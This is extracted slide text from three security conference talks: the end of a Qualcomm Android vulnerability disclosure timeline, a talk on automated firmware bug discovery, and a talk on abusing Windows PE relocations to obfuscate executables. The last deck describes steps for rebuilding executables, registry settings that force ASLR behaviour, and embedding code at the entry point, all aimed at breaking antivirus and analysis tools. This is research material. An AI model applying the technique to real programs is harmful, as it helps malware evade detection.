Qualcomm released a public
patch
1st August, 2016
Google deployed the patch to
their Android devices
ASHmenian Devil (CVE-2016-5340)
10th April, 2016
Vulnerability disclosure to
Qualcomm
02nd May, 2016
Qualcomm confirmed the
vulnerability
28th July, 2016
Qualcomm released a public
patch
TBD
Google deployed the patch to
their Android devices
Qualaroot (CVE-2016-2059)
2nd February, 2016
Vulnerability disclosure to
Qualcomm
10th February, 2016
Qualcomm confirmed the
vulnerability
29th April, 2016
Qualcomm released a public
patch
TBD
Google deployed the patch to
their Android devices
• Disclosure
SELinux, for being liberal,
letting anyone access mechanisms like Qualcomm’s IPC
commit_creds for always being there for me
Absense of kASLR,
for not breaking me and commit_creds apart
Google Play
QuadRooter Scanner
Adam Donenfeld
[email protected] | pdf |
FIRMWARE SLAP:
AUTOMATING DISCOVERY OF
EXPLOITABLE VULNERABILITIES IN
FIRMWARE
CHRISTOPHER ROBERTS
WHO AM I
• Researcher at REDLattice Inc.
• Interested in finding bugs in embedded systems
• Interested in program analysis
• CTF Player
A QUICK BACKGROUND
IN EXPLOITABLE BUGS
DARPA CYBER
GRAND
CHALLENGE
• Automated cyber reasoning
systems:
• Find vulnerabilities
• Exploit vulnerabilities
• Patch vulnerabilities
• Automatically generates full
exploits and proof of
concepts.
PREVENTING
BUGS
AUTOMATICALLY
• Source level protections
• LLVM’s Clang static analyzers
• Compile time protections
• Non-executable stack
• Stack canaries
• RELRO
• _FORTIFY_SOURCE
• Operating system protections
• ASLR
PREVENTING
BUGS
AUTOMATICALLY
• Source level protections
• LLVM’s Clang static analyzers - Maybe
• Compile time protections
• Non-executable stack - Maybe
• Stack canaries
• RELRO
• _FORTIFY_SOURCE
• Operating system protections
• ASLR
In Embedded
Devices
EXPLOIT
MITIGATIONS
• There has to be an exploit to
mitigate it, right?
Non-executable
stack
Stack Canaries
RELRO
_FORTIFY
SOURCE
ASLR
ALMOND 3
DEMO
• CVE-2019-13087
• CVE-2019-13088
• CVE-2019-13089
• CVE-2019-13090
• CVE-2019-13091
• CVE-2019-13092
CONCOLIC ANALYSIS
• Symbolic Analysis + Concrete Analysis
• Lots of talks already on this subject.
• Really good at find specific inputs to trigger code
paths
• For my work in Firmware Slap I used angr!
• Concolic analysis
• CFG analysis
• Used in Cyber Grand Challenge for 3rd place!
BUILDING REAL INPUTS
FROM SYMBOLIC DATA
• Source level protections
• LLVM’s Clang static analyzers
• Compile time protections
• Non-executable stack
• Stack canaries
• RELRO
• _FORTIFY_SOURCE
• Operating system protections
• ASLR
• Symbolic Variable Here
• get_user_input()
• To get our “You did it”
output
• angr will create several
program states
• One has the constraints:
• x >= 200
• x < 250
• angr sends these
constraints to it’s
theorem prover to give:
• X=231 or x=217
or x=249…
• Symbolically represent more of the program state.
• Registers, Call Stack, Files
• Query the analysis for more interesting conditions
• Does a network read influence or corrupt the program counter?
• Does network data get fed into sensitive system calls?
• Can we track all reads and writes required to trigger a vulnerability?
WHERE DOES CONCOLIC
ANALYSIS FAIL?
Memory Usage
•
Big code bases
•
Angr is trying to map out every single
potential path through a program. Programs
of non-trivial size will eat all your resources.
•
A compiled lightttpd binary might be
~200KB
•
Angr will run your computer out of memory
before it can example every potential
program state in a webserver
•
Embedded system’s firmware can be a lot
larger…
• Challenge:
• Model complicated binaries with limited resources
• Model unknown input
• Identify vulnerabilities in binaries
• Find binaries and functions that similar to one-another
Start
Parse
Config
Setup
sockets
Parse user
input
Action 1
Nothing
interesting
Action 2
Nothing
interesting
Action 3
Nothing
interesting
Action 4
Nothing
interesting
Action 5
Vulnerable
code
• Underconstraining concolic analysis:
• Values from hardware peripherals and NVRAM are UNKNOWN
• Spin up and initialization consumes valuable time and resources
• Configs can be setup any number of ways
• Skip the hard stuff
• Make hardware peripherals and NVRAM return symbolic variables
• Start concolic analysis after the initialization steps
Start
Parse
Config
Setup
sockets
Parse user
input
Action 1
Nothing
interesting
Action 2
Nothing
interesting
Action 3
Nothing
interesting
Action 4
Nothing
interesting
Action 5
Vulnerable
code
• angr can analyze code at this level, but
it needs to know where to start.
• Ghidra can produce a function
prototype that angr can use to analyze
a function…
MODELING FUNCTIONS
• Finding bugs in binaries
• Recover every function prototype using ghidra
• Build an angr program state with information with symbolic arguments from the
prototype
• Run each analysis job in parallel
FINDING BUGS IN FUNCTIONS
• Demo
• With less code to analyze we can introduce more heavy-weight analysis
• Tracking memory instructions imposed by all instructions
• Memory regions tainted by user supplied arguments
• Mapping memory loading actions to values in memory.
• Every step through a program
• Store any new constraints to user input
• Does user input influence a system() call or corrupt the program counter
• Does user input taint a stack or heap variable
FUNCTION
SIMILARITY
• Bindiff and diaphora are the
standard for binary diffing.
•
They help us find what code was
actually patched when a CVE and a
patch is published.
•
Uses a set of heuristics to build a
signature for every function in a binary
•
Basic block count
•
Basic block edges
•
Function references
• Both of these tools are tied to IDA
• The workflow is built around one-off comparisons
CLUSTERING
• Helps us understand how similar
are two things?
• Extract features from each thing
• For dots on a grid it can be:
• X location
• Y location
K-MEANS CLUSTERING
Extract features
Pick two random points
Categorize each point to one of those
random points
•Use Euclidian or cosine distance to find which is closest
Pick new cluster center by
averaging each category by
feature and using the point closest.
Recategorize all the points into
categories.
• Rinse and repeat until points don’t move!
CLUSTERING – WHY
THIS WORKS
• Features don’t have to be numbers…
• They can be the existence (0 or 1) of:
• String references
• Data references
• Function arguments
• Basic block count
• All of these features can be extracted
from reverse engineering tools like…
• Ghidra, Radare2, or Binary Ninja
IT ONLY WORKS IF YOU GUESS THE RIGHT NUMBER OF CLUSTERS
SUPERVISED CLUSTERING
• Supervised anything machine learning uses KNOWN values to cluster data
• We also know how many clusters there should be
• Our functions inside our binaries could be supervised if every function was
known to be vulnerable or benign
• Embedded systems programming gives us no assurances.
SEMI-SUPERVISED CLUSTERING
• Semi-Supervised clustering uses SOME KNOWN values to cluster data
• If we use public CVE information to find which functions in a binary are
KNOWN vulnerable, we can guess that really similar functions might also be
vulnerable.
• We can set our cluster count to the number of known vulnerable functions in a
binary
• Finding features in binaries to cluster
• Wrote a Ghidra headless plugin to dump all
function information
• Data/String/Call references are changed to
binary (0/1) it exists or it doesn’t
• All numbers are normalized
• Being at offset 0x80000000 shouldn’t matter
more then having 2 function arguments.
• Throw away useless information
• A Chi^2 squared test is used to see how much a
feature defines an item.
• If every function has the same calling convention,
the Chi^2 squared test will throw it away.
DATA MINING + CONCOLIC ANALYSIS
• Demo
• CVE-2019-13087
• Taking it further…
• Selecting a better number of clusters through cluster scoring
• Silhouette score ranks how similar each cluster of functions are
• This separates functions into clusters of similar tasks
• String operation functions
• Destructors/Constructors
• File manipulation
•
Web request handling
•
etc..
FINDING THE
FUNCTION
CLUSTER
COUNT
FIRMWARE SLAP
Export
Data to JSON and send into elastic search
Cluster
Functions according to best feature set
Extract
Best function features using SKlearn
Build and run
angr analysis jobs
Recover
Function prototypes from every binary
Locate
System root
Extract
Firmware
VISUALIZING
VULNERABILITY
RESULTS
• All information generated as
JSON from both concolic and
data mining pass
• Includes script to load
information into Elasticsearch
and Kibana
MITIGATIONS
• Use compile time protections
• Enable your operating system’s ASLR
• Buy a better router
• It’s time to bring more automation into checking our embedded systems
• Don’t blindly trust third-party embedded systems
• I’m giving you the tools to find the bugs yourself
RELEASING
• Firmware Slap – The tool behind the demos
• The Ghidra function dumping plugin
• The cleaned-up PoCs
• CVE-2019-13087 - CVE-2019-13092
• Code:
• https://github.com/ChrisTheCoolHut/Firmware_Slap
• Feedback? Questions?
• @0x01_chris | pdf |
Relocation Bonus
Attacking the Windows Loader Makes Analysts Switch Careers
1 / 67
Introduction
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Author of Game Hacking: Developing Autonomous Bots for Online Games
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Author of Game Hacking: Developing Autonomous Bots for Online Games
Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Author of Game Hacking: Developing Autonomous Bots for Online Games
Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness
Relocation Bonus
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Author of Game Hacking: Developing Autonomous Bots for Online Games
Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness
Relocation Bonus
A look into the Windows Portable Executable (PE) header and how it can be
weaponized to destroy parsers, disassemblers, and other tools
Relocation Bonus - Introduction
2 / 67
Introduction
Nick Cano
25 years old
Senior Security Architect at Cylance
Author of Game Hacking: Developing Autonomous Bots for Online Games
Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness
Relocation Bonus
A look into the Windows Portable Executable (PE) header and how it can be
weaponized to destroy parsers, disassemblers, and other tools
A PE rebuilder that takes any 32bit PE then obfuscates and rebuilds it using the
attack
Relocation Bonus - Introduction
2 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
3 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
3 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
4 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
5 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
6 / 67
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
7 / 67
its broken for no
reason
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
7 / 67
its broken for no
reason
relocations corrupted
the patched code
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
7 / 67
its broken for no
reason
relocations corrupted
the patched code
don't patch code that
is relocated
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
7 / 67
its broken for no
reason
relocations corrupted
the patched code
don't patch code that
is relocated
relocations can be
weaponized to hide
my arsenal in the
bowels of the
machine
Why Attack Relocations?
Relocation Bonus - How Did I Get Here?
7 / 67
Mission Statement
Relocation Bonus - Crafting The Attack
8 / 67
Mission Statement
Relocation Bonus - Crafting The Attack
8 / 67
What Are Relocations?
Relocation Bonus - Crafting The Attack
9 / 67
What Are Relocations?
Relocations exist to enable dynamic mapping, specifically ASLR
Relocation Bonus - Crafting The Attack
9 / 67
What Are Relocations?
Relocations exist to enable dynamic mapping, specifically ASLR
Relocation Bonus - Crafting The Attack
9 / 67
What Are Relocations?
Relocations exist to enable dynamic mapping, specifically ASLR
Relocation Bonus - Crafting The Attack
10 / 67
What Are Relocations?
Relocations exist to enable dynamic mapping, specifically ASLR
Relocation Bonus - Crafting The Attack
11 / 67
What Are Relocations?
Relocations exist to enable dynamic mapping, specifically ASLR
Relocation Bonus - Crafting The Attack
12 / 67
PE Header Sidebar
Relocation Bonus - Crafting The Attack
13 / 67
PE Header Sidebar
Relocation Bonus - Crafting The Attack
13 / 67
PE Header Sidebar
Relocation Bonus - Crafting The Attack
14 / 67
PE Header Sidebar
Relocation Bonus - Crafting The Attack
15 / 67
PE Header Sidebar
Relocation Bonus - Crafting The Attack
16 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
17 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
18 / 67
VirtualAddress points to first reloc
block
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
19 / 67
VirtualAddress points to first reloc
block
Size is the size, in bytes, of all blocks
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
20 / 67
VirtualAddress points to first reloc
block
Size is the size, in bytes, of all blocks
(uint16_t)0x0000 marks the end of
each block
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
21 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
22 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
23 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
24 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
25 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
26 / 67
How Do Relocations Work?
Relocation Bonus - Crafting The Attack
27 / 67
How Do Relocations Work?
Something like this
delta = base - desiredBase;
(
reloc : relocs) {
block = (base + reloc.VirtualAddress);
(
entry : reloc.entries) {
adr = block + entry.offset;
(entry.type == IMAGE_REL_BASED_HIGHLOW) // <- this
*((
*)adr) += delta;
(entry.type == IMAGE_REL_BASED_DIR64)
*((
*)adr) += delta;
(entry.type == IMAGE_REL_BASED_HIGH)
*((
*)adr) += (
)((delta >> 16) & 0xFFFF);
(entry.type == IMAGE_REL_BASED_LOW)
*((
*)adr) += (
)delta;
}
}
Relocation Bonus - Crafting The Attack
27 / 67
Controlling Relocations
Relocation Bonus - Crafting The Attack
28 / 67
Controlling Relocations
Relocations simply use a += operation on data at a specified address
Relocation Bonus - Crafting The Attack
28 / 67
Controlling Relocations
Relocations simply use a += operation on data at a specified address
The right-hand side of this operation will be delta
Relocation Bonus - Crafting The Attack
28 / 67
Controlling Relocations
Relocations simply use a += operation on data at a specified address
The right-hand side of this operation will be delta
delta is defined as base - desiredBase
Relocation Bonus - Crafting The Attack
28 / 67
Controlling Relocations
Relocations simply use a += operation on data at a specified address
The right-hand side of this operation will be delta
delta is defined as base - desiredBase
Conclusion: to abuse relocations, base must be preselected, giving a predictable
delta. This means ASLR must be tricked.
Relocation Bonus - Crafting The Attack
28 / 67
ASLR Preselection
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
0x00000000
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
0x00000000: PE fails to load; invalid header
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
0x00000000: PE fails to load; invalid header
0xFFFF0000
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
0x00000000: PE fails to load; invalid header
0xFFFF0000: PE loads at base 0x00010000
Relocation Bonus - Crafting The Attack
29 / 67
ASLR Preselection
desiredBase is the only means of controlling ASLR
delta is dependant on desiredBase
Conclusion: because of how delta is derived, desiredBase must be made to force
ASLR mapping at a predetermined address which isn't desiredBase itself.
Knowing this, I tried desiredBase as:
0xFFFFFFFF: PE fails to load; invalid header
0x00000000: PE fails to load; invalid header
0xFFFF0000: PE loads at base 0x00010000
As I later learned, Corkami had already figured all of this out: https://github.com/corkami/pocs/
Relocation Bonus - Crafting The Attack
29 / 67
PE Loader Breakdown
Relocation Bonus - Crafting The Attack
30 / 67
PE Loader Breakdown
Relocation Bonus - Crafting The Attack
30 / 67
PE Loader Breakdown
Relocation Bonus - Crafting The Attack
31 / 67
PE Loader Breakdown
Relocation Bonus - Crafting The Attack
32 / 67
Targets For Relocation Obfuscation
Relocation Bonus - Crafting The Attack
33 / 67
Targets For Relocation Obfuscation
Import Table is loaded post-reloc
Relocation Bonus - Crafting The Attack
33 / 67
Targets For Relocation Obfuscation
Import Table is loaded post-reloc
Many sections are mapped pre-reloc, but not used until execution which is post-reloc
Relocation Bonus - Crafting The Attack
33 / 67
Targets For Relocation Obfuscation
Import Table is loaded post-reloc
Many sections are mapped pre-reloc, but not used until execution which is post-reloc
entryPoint isn't used until execution, post-reloc; the memory will be read-only,
however, unless DEP is off
Relocation Bonus - Crafting The Attack
33 / 67
Targets For Relocation Obfuscation
Import Table is loaded post-reloc
Many sections are mapped pre-reloc, but not used until execution which is post-reloc
entryPoint isn't used until execution, post-reloc; the memory will be read-only,
however, unless DEP is off
Conclusion: can mangle imports, code and resource sections, and optionally the
entryPoint if DEP is off on the target machine.
Relocation Bonus - Crafting The Attack
33 / 67
Targets For Relocation Obfuscation
Relocation Bonus - Crafting The Attack
34 / 67
Targets For Relocation Obfuscation
Relocation Bonus - Crafting The Attack
34 / 67
Targets For Relocation Obfuscation
Relocation Bonus - Crafting The Attack
35 / 67
The Final Attack
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Loop over data to obfuscate in uint32_t-sized chunks, decrementing each by
0x00010000 - 0xFFFF0000 (expected value of delta)
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Loop over data to obfuscate in uint32_t-sized chunks, decrementing each by
0x00010000 - 0xFFFF0000 (expected value of delta)
Discard original relocations table
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Loop over data to obfuscate in uint32_t-sized chunks, decrementing each by
0x00010000 - 0xFFFF0000 (expected value of delta)
Discard original relocations table
Generate new relocations table containg the location of each decrement done inside
of the loop (using IMAGE_REL_BASED_HIGHLOW)
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Loop over data to obfuscate in uint32_t-sized chunks, decrementing each by
0x00010000 - 0xFFFF0000 (expected value of delta)
Discard original relocations table
Generate new relocations table containg the location of each decrement done inside
of the loop (using IMAGE_REL_BASED_HIGHLOW)
Save new PE file to disk
Relocation Bonus - Crafting The Attack
36 / 67
The Final Attack
Due to the nature of the attack, it works best as a tool which rebuilds regular PE files.
Load target PE file
Apply original relocations for base of 0x00010000
Turn ASLR off by flipping a bit in the PE Header
Set desiredBase to 0xFFFF0000
Loop over data to obfuscate in uint32_t-sized chunks, decrementing each by
0x00010000 - 0xFFFF0000 (expected value of delta)
Discard original relocations table
Generate new relocations table containg the location of each decrement done inside
of the loop (using IMAGE_REL_BASED_HIGHLOW)
Save new PE file to disk
??? profit
Relocation Bonus - Crafting The Attack
36 / 67
37 / 67
Testing The Attack
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Windows 8
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Windows 8 ... nobody uses this shit
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Windows 8 ... nobody uses this shit
Windows 10
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Windows 8 ... nobody uses this shit
Windows 10
Relocation Bonus - Rejected by Windows 10
38 / 67
Testing The Attack
Windows 7 ... works !
Windows 8 ... nobody uses this shit
Windows 10
Relocation Bonus - Rejected by Windows 10
38 / 67
THE END
39 / 67
Exploring New Terrain
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Set Mandatory ASLR to On
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Set Mandatory ASLR to On
Set Bottom-Up ASLR to Off
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Set Mandatory ASLR to On
Set Bottom-Up ASLR to Off
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Image File Execution Options\NAME_OF_EXE]
"MitigationAuditOptions"=hex:00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00
"MitigationOptions"=hex:00,01,22,00,00,00,00,00,\
00,00,00,00,00,00,00,00
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Set Mandatory ASLR to On
Set Bottom-Up ASLR to Off
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Image File Execution Options\NAME_OF_EXE]
"MitigationAuditOptions"=hex:00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00
"MitigationOptions"=hex:00,01,22,00,00,00,00,00,\
00,00,00,00,00,00,00,00
Conclusion: it can work on Windows 10
Relocation Bonus - Rejected by Windows 10
40 / 67
Exploring New Terrain
Embed PE copies for all possible base addresses ... way too big
Tweaking ASLR Configuration ... works!
Set Mandatory ASLR to On
Set Bottom-Up ASLR to Off
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Image File Execution Options\NAME_OF_EXE]
"MitigationAuditOptions"=hex:00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00
"MitigationOptions"=hex:00,01,22,00,00,00,00,00,\
00,00,00,00,00,00,00,00
Conclusion: it can work on Windows 10, but I don't like it
Relocation Bonus - Rejected by Windows 10
40 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
41 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
41 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
42 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
43 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
44 / 67
A New Hope
Relocation Bonus - Rejected by Windows 10
45 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
46 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
46 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
47 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
48 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
49 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
50 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
51 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
52 / 67
Preselection via File Mapping Invalidation
Relocation Bonus - Rejected by Windows 10
53 / 67
Weaponization
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
For this to work, the ASLR preselection code must be:
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
For this to work, the ASLR preselection code must be:
Position-agnostic
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
For this to work, the ASLR preselection code must be:
Position-agnostic
Generically embeddable in any PE
Relocation Bonus - Rejected by Windows 10
54 / 67
Weaponization
The tool must:
Create a new section with enough room for the code
Embed the code inside of this new section
Inform the embedded code of the true EntryPoint
Overwrite EntryPoint to point to the embedded code
For this to work, the ASLR preselection code must be:
Position-agnostic
Generically embeddable in any PE
Relocation Bonus - Rejected by Windows 10
54 / 67
55 / 67
56 / 67
Weaponization
Relocation Bonus - Rejected by Windows 10
57 / 67
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
57 / 67
Caveats
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
57 / 67
Caveats
It can be slow, averaging of 200
iterations to land
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
58 / 67
Caveats
It can be slow, averaging of 200
iterations to land
Imports can't be obfuscated
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
59 / 67
Caveats
It can be slow, averaging of 200
iterations to land
Imports can't be obfuscated
Advantages
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
60 / 67
Caveats
It can be slow, averaging of 200
iterations to land
Imports can't be obfuscated
Advantages
Base can be anything, not just
0x00010000!
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
61 / 67
Caveats
It can be slow, averaging of 200
iterations to land
Imports can't be obfuscated
Advantages
Base can be anything, not just
0x00010000!
As a side effect, some form of symbolic
execution is needed to discover the
intended base in order to fix up the file
for analysis.
Weaponization
It works!
Relocation Bonus - Rejected by Windows 10
62 / 67
63 / 67
Use Cases
Relocation Bonus - Wrap Up
64 / 67
Use Cases
Annoying analysts
Relocation Bonus - Wrap Up
64 / 67
Use Cases
Annoying analysts
Breaking automated static analysis systems
Relocation Bonus - Wrap Up
64 / 67
Use Cases
Annoying analysts
Breaking automated static analysis systems
Breaking tools
Relocation Bonus - Wrap Up
64 / 67
Use Cases
Annoying analysts
Breaking automated static analysis systems
Breaking tools
Breaking AV Parsers
Relocation Bonus - Wrap Up
64 / 67
Potential Improvements
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
